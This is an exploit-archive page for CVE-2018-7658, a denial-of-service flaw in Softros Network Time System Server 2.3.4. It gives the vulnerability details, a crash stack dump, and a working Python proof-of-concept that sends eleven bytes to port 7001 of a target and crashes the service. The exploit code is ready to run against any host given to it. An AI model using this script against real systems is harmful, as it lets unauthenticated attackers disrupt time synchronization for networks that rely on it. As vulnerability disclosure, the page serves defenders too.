Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtHyp3rlinx1337DAY-ID-29952
HistoryMar 06, 2018 - 12:00 a.m.

Softros Network Time System Server 2.3.4 - Denial of Service Exploit

2018-03-0600:00:00
hyp3rlinx
0day.today
40

EPSS

0.619

Percentile

97.8%

JSON

Exploit for windows platform in category dos / poc

[+] Credits: John Page (aka hyp3rlinx)      
 
Vendor:
=============
www.softros.com
https://nts.softros.com/downloads/
 
 
Product:
===========
Network Time System Server v2.3.4 
Both x86/x64 versions
 
 
Network Time System provides a solution to system time maintenance problems. This powerful client/server software enables you to set up a
virtually fail-safe synchronized time environment for networks of any size and complexity, from small office networks (LAN) to those
maintained at large enterprises (VPN, VLAN, WAN), from single site networks to those including numerous domains and involving complex
routing techniques. Network Time System allows the creation of a custom source of precise time in a corporate network environment
establishing an interconnected time synchronization system for each and every machine and device on the company network.
 
 
Vulnerability Type:
===================
Denial Of Service
 
 
 
CVE Reference:
==============
CVE-2018-7658
 
 
Security Issue:
================
Network Time System (Server) "NTSServerSvc" service listens on Port 7001, unauthenticated remote attackers can crash the
Server by sending exactly 11 bytes to the target system. Systems which may depend on critical time synchronization 
could then potentially be impacted.
 
 
Stack dump:
 
'''
eax=0320119a ebx=0000000b ecx=000000ff edx=00000000 esi=03167040 edi=0050b328
eip=004069a5 esp=0447fee8 ebp=0447ff28 iopl=0         nv up ei ng nz ac pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297
NTSServerSvc+0x69a5:
004069a5 880a            mov     byte ptr [edx],cl          ds:0023:00000000=??
Resetting default scope
 
FAULTING_IP: 
NTSServerSvc+69a5
004069a5 880a            mov     byte ptr [edx],cl
 
EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 004069a5 (NTSServerSvc+0x000069a5)
   ExceptionCode: c0000005 (Access violation)
 
'''
 
 
Exploit/POC:
=============
import socket
#Network Time System (Server) NTSServerSvc.exe v2.3.4 
#Softros Systems
#NTS Server service for time synchronization over network
 
print 'Network Time Server 11 byte Denial Of Service'
print 'by hyp3rlinx'
HOST=raw_input('Network Time Server IP')
PORT=7001
payload='A'*11 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((HOST,PORT))
s.send(payload)
s.close()

#  0day.today [2018-03-20]  #

Related

packetstorm 1
cve 1
exploitpack 1
cvelist 1
exploitdb 1
prion 1
nvd 1
packetstorm
packetstorm
Softros Network Time System Server 2.3.4 Denial Of Service
2018-03-05 00:00:00
cve
cve
CVE-2018-7658
2018-03-26 21:29:00
exploitpack
exploitpack
Softros Network Time System Server 2.3.4 - Denial of Service
2018-03-06 00:00:00
cvelist
cvelist
CVE-2018-7658
2018-03-26 21:00:00
exploitdb
exploitdb
Softros Network Time System Server 2.3.4 - Denial of Service
2018-03-06 00:00:00
prion
prion
Code injection
2018-03-26 21:29:00
nvd
nvd
CVE-2018-7658
2018-03-26 21:29:00

EPSS

0.619

Percentile

97.8%

JSON
Related for 1337DAY-ID-29952
packetstorm1cve1exploitpack1cvelist1exploitdb1prion1nvd1